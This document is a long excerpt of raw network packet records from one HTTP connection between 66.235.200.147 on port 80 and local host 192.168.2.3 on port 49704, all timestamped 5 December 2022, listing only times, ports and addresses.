Dec 5, 2022 01:32:31.460031986 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.460056067 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.460082054 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.460086107 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.460108995 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.460134029 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.460135937 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.460186958 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.460860968 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.460896969 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.460925102 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.460952044 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.460957050 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.460978985 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.461000919 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.463819027 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.463854074 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.463876963 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.463905096 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.463918924 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.463931084 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.463943958 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.463958025 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.463984966 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.463999987 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.464014053 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.464034081 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.464042902 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.464093924 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.464279890 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.464308977 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.464335918 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.464360952 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.464365005 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.464391947 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.464415073 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.464416981 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.464442015 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.464467049 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.464473963 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.464493036 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.464518070 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.465202093 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.465229988 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.465255976 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.465271950 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.465281963 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.465308905 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.465308905 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.465334892 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.465359926 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.465367079 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.465414047 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.466015100 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.466053009 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.466083050 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.466109991 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.466110945 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.466136932 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.466161966 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.466167927 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.466186047 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.466211081 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.466212034 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.466239929 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.466262102 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.466949940 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.466978073 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.467001915 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.467025042 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.467029095 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.467060089 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.467063904 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.467087030 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.467111111 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.467114925 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.467143059 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.467164993 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.467170000 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.467217922 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.467847109 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.467874050 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.467896938 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.467922926 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.467941999 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.467948914 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.467972994 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.467977047 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.468004942 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.468028069 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.468029022 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.468056917 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.468076944 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.468712091 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.468786955 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.468800068 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.468828917 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.468857050 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.468879938 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.468884945 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.468913078 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.468936920 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.468940020 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.468967915 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.468987942 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.468996048 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.469023943 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.469043970 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.469705105 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.469733953 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.469758987 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.469769001 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.469784975 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.469805956 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.469811916 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.469839096 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.469858885 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.469866037 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.469892025 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.469917059 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.469918966 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.469944954 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.469968081 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.470681906 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.470710993 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.470738888 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.470750093 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.470766068 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.470787048 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.470794916 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.470823050 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.470843077 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.470850945 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.470889091 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.470905066 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.470917940 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.470944881 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.470968962 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.471652031 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.471687078 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.471724987 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.471749067 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.471750975 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.471774101 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.471781969 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.471816063 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.471832991 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.471847057 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.471878052 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.471895933 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.471908092 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.471940994 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.471959114 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.472609043 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.472677946 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.477785110 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.477835894 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.477874994 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.477915049 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.477955103 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.477997065 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.478025913 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.478025913 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.478038073 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.478076935 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.478077888 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.478116989 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.478152037 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.478161097 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.478204966 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.478219032 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.478245974 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.478286982 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.478313923 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.478327990 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.478388071 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.478404999 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.478427887 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.478473902 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.478501081 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.478509903 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.478555918 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.478581905 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.479134083 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.479166985 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.479197025 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.479207993 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.479228973 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.479248047 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.479259968 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.479290962 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.479310989 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.479322910 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.479356050 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.479373932 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.479386091 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.479418993 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.479434967 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.480081081 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.480113029 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.480143070 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.480149031 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.480171919 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.480195045 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.480200052 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.480232000 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.480249882 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.480262995 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.480293036 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.480313063 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.480323076 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.480354071 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.480371952 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.481065989 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.481098890 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.481128931 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.481137991 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.481157064 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.481175900 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.481185913 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.481215954 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.481235981 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.481245995 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.481276989 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.481295109 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.481306076 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.481334925 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.481355906 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.482047081 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.482079983 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.482109070 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.482114077 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.482139111 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.482157946 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.482167006 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.482197046 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.482215881 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.482227087 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.482258081 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.482274055 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.482286930 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.482316971 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.482337952 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.483011961 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.483072996 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.483112097 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.483117104 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.483163118 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.483177900 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.483205080 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.483247995 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.483289957 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.483289957 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.483339071 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.483350039 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.483383894 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.483428001 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.483450890 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.483971119 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.484004021 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.484035015 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.484036922 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.484066963 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.484086990 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.484098911 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.484127045 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.484158039 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.484160900 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.484189987 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.484208107 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.484221935 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.484251976 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.484271049 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.484369040 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.484956980 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.484987974 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.485014915 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.485024929 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.485043049 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.485064983 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.485073090 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.485100985 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.485122919 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.485130072 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.485157967 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.485182047 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.485197067 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.485222101 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.485244036 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.485886097 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.488890886 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.488925934 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.488953114 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.488965988 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.488979101 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.489006042 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.489006996 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.489034891 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.489054918 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.489063025 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.489092112 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.489111900 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.489120960 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.489150047 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.489167929 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.489356041 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.489413977 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.489429951 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.489577055 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.489604950 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.489631891 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.489634991 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.489661932 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.489682913 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.489690065 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.489717007 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.489739895 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.489747047 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.489777088 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.489797115 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.490353107 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.490381956 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.490408897 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.490411997 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.490436077 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.490457058 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.490466118 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.490494013 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.490515947 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.490523100 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.490551949 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.490571022 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.490578890 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.490606070 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.490638971 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.491365910 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.491394997 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.491420984 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.491434097 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.491447926 CET	80	49704	66.235.200.147	192.168.2.3
